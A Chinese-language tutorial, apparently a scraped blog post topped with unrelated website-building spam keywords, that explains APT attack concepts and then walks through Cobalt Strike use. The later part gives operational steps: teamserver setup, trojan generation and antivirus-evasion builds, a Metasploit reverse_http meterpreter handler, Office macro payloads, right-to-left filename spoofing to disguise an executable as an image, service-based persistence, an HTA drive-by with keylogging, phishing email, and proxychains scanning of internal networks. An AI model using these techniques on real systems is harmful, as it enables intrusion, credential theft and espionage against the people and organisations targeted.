环保公司网站建设方案,驾校网站建设方案题婚,湘潭网站优化,网站建设 金手指 排名221.1 APT攻击简介
1.1.1APT攻击概念 网络安全#xff0c;尤其是Internet互联网安全正在面临前所未有的挑战#xff0c;这主要就来自于有组织、有特定目标、持续时间极长的新型攻击和威胁#xff0c;国际上有的称之为APT#xff08;Advanced Persistent Threat#xff09;攻…1.1 APT攻击简介
1.1.1APT攻击概念 网络安全尤其是Internet互联网安全正在面临前所未有的挑战这主要就来自于有组织、有特定目标、持续时间极长的新型攻击和威胁国际上有的称之为APTAdvanced Persistent Threat攻击或者称之为“针对特定目标的攻击”。
高级持续性威胁 APT攻击的原理相对于其他攻击形式更为先进其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。 APT是黑客以窃取核心资料为目的针对客户所发动的网络攻击和侵袭行为是一种蓄谋已久的“恶意商业间谍威胁”。这种行为往往经过长期的经营与策划并具备高度的隐蔽性。 APT的攻击手法在于隐匿自己针对特定对象长期、有计划性和组织性地窃取数据这种发生在数字空间的偷窃资料、搜集情报的行为就是一种“网络间谍”的行为。 有些将APT定义为由民族或国家发起的攻击有些则将APT描述为窃取一般数据或者知识产权信息的威胁。而准确地说高级持续性威胁(Advanced Persistent Threat)是指组织(特别是政府)或者小团体使用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。本文中我们将看看APT(高级持续性威胁)是如何演变的以及你需要如何抵御这种类型的威胁。
1.1.2APT攻击的威胁
目标性强 不同于以往的常规病毒APT制作者掌握高级漏洞发掘和超强的网络攻击技术。发起APT攻击所需的技术壁垒和资源壁垒要远高于普通攻击行为。其针对的攻击目标也不是普通个人用户而是拥有高价值敏感数据的高级用户特别是可能影响到国家和地区政治、外交、金融稳定的高级别敏感数据持有者。
持续性 攻击者为了重要的目标长时间持续攻击直到攻破为止。攻击成功用上一年到三年攻击成功后持续潜伏五年到十年的案例都有。这种持续性攻击下让攻击完全处于动态发展之中而当前我们的防护体系都是强调静态对抗能力很少有防护者有动态对抗能力因此防护者或许能挡住一时的攻击但随时间的发展系统不断有新的漏洞被发现防御体系也会存在一定的空窗期比如设备升级、应用需要的兼容性测试环境等等最终导致系统的失守。
终端性 攻击者虽然针对的是重要的资产目标但是入手点却是终端为主。再重要的目标也是由终端的人来访问的。而人在一个大型组织里是难以保证所有人的安全能力与安全意识都处于一个很高水准之上的。而做好每个人的终端防护比服务器端防护要困难很多。通过SQL注射攻击了WEB服务器一般也是希望利用他攻击使用这些WEB服务器的终端用户作为跳板渗透进内网。
广谱信息收集性 攻击者会花上很长的时间和资源依靠互联网搜集主动扫描甚至真实物理访问方式收集被攻击目标的信息主要包括组织架构人际关系常用软件常用防御策略与产品内部网络部署等信息。
针对性 攻击者会针对收集到的常用软件常用防御策略与产品内部网络部署等信息搭建专门的环境用于寻找有针对性安全漏洞测试特定的木马是否能饶过检测。
未知性 攻击者依据找到的针对性安全漏洞特别是0DAY根据应用本身构造专门的触发攻击的代码。并编写符合自己攻击目标但能饶过现有防护者检测体系的特种木马。这些0DAY漏洞和特种木马都是防护者或防护体系所不知道的。
渗透性社工 攻击者为了让被攻击者目标更容易信任往往会先从被攻击者目标容易信任的对象着手比如攻击一个被攻击者目标的电脑小白好友或家人或者被攻击者目标使用的内部论坛通过他们的身份再对组织内的被攻击者目标发起0DAY攻击成功率会高很多。再利用组织内的已被攻击成功的身份再去渗透攻击他的上级逐步拿到对核心资产有访问权限的目标。
极强的隐蔽性 对此可这样理解APT攻击已经与被攻击对象的可信程序漏洞与业务系统漏洞进行了融合在组织内部这样的融合很难被发现。攻击者访问到重要资产后往往通过控制的客户端分布使用合法加密的数据通道将信息窃取出来以饶过我们的审计和异常检测的防护。伪造了合法的数字证书冒充正规软件实现了欺骗攻击。
长期潜伏与持续性控制 攻击者长期控制重要目标获取的利益更大。一般都会长期潜伏下来控制和窃取重要目标。当然也不排除在关键时候破坏型爆发。 APT攻击是一种很有耐心的攻击形式攻击和威胁可能在用户环境中存在一年以上他们不断收集用户信息直到收集到重要情报。他们往往不是为了在短时间内获利而是把“被控主机”当成跳板持续搜索直到充分掌握目标对象的使用行为。所以这种攻击模式本质上是一种“恶意商业间谍威胁”因此具有很长的潜伏期和持续性。
1.2 ATP主要工具cs介绍 集成了提权凭据导出端口转发socket代理office攻击文件捆绑钓鱼等功能。同时Cobalt Strike还可以调用Mimikatz等其他知名工具因此广受黑客喜爱。 一、启动连接服务器
chmod 777 teamserver 赋予权限 启动服务端(test 为待会靶机连接服务器的密码 ./teamserver 10.0.0.131 test 客户端 双击cs,bat 密码为test 成功连接 二、让主机上线
创建监听器 下面的add 生成木马 保存到桌面 可以找一个在线cs免杀马 将生成的放入windows2003 双击可以检测到 三、结合metasploit,反弹shell产生联动
使用kail 打开msfconsole 添加一个上面为IP下面为7777 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 10.0.0.131 set lport 7777 增加会话 可以进行内网渗透任意攻击
四、office宏payload应用 复制 创建删掉原有的复制 双击打开就会显示可以控制对方电脑
五、图片编码
命名为图片gnp.exe 重命名在片和g之间右键unicode 变为这个样子 六、Https Payload应用
优点可能过行为查杀、另外administrator运行可直接提升为system权限 创建服务 Sc create test binpath ”c:\test.exe” start auto displayname ”test”
七、信息收集 在线短链接生成器 八、hta网页挂马 将文件保存到桌面 进入目录查看已经存在 打开win7在百度内搜http://10.0.0.131:443/ 会进行键盘记录 九、邮件钓鱼
先生成木马放入2003双击查看到2003信息 在qq邮箱导出eml文件 弄一个钓鱼地址 十、Socks代理应用
设置代理端口 查看代理信息 复制信息 利用msf进行攻击 粘贴进kail 还可以在配置文件vim /etc/proxychains.conf4 在后面加127.0.0.1 端口为生成端口 使用代理扫描内网 proxychains nmap -sP 172.16.0.0/24
十一、cs提权与内网渗透
安装插件 https://github.com/k8gege/Aggressor 安装神龙拉动介绍 https://github.com/k8gege/Ladon 神龙拉动下载
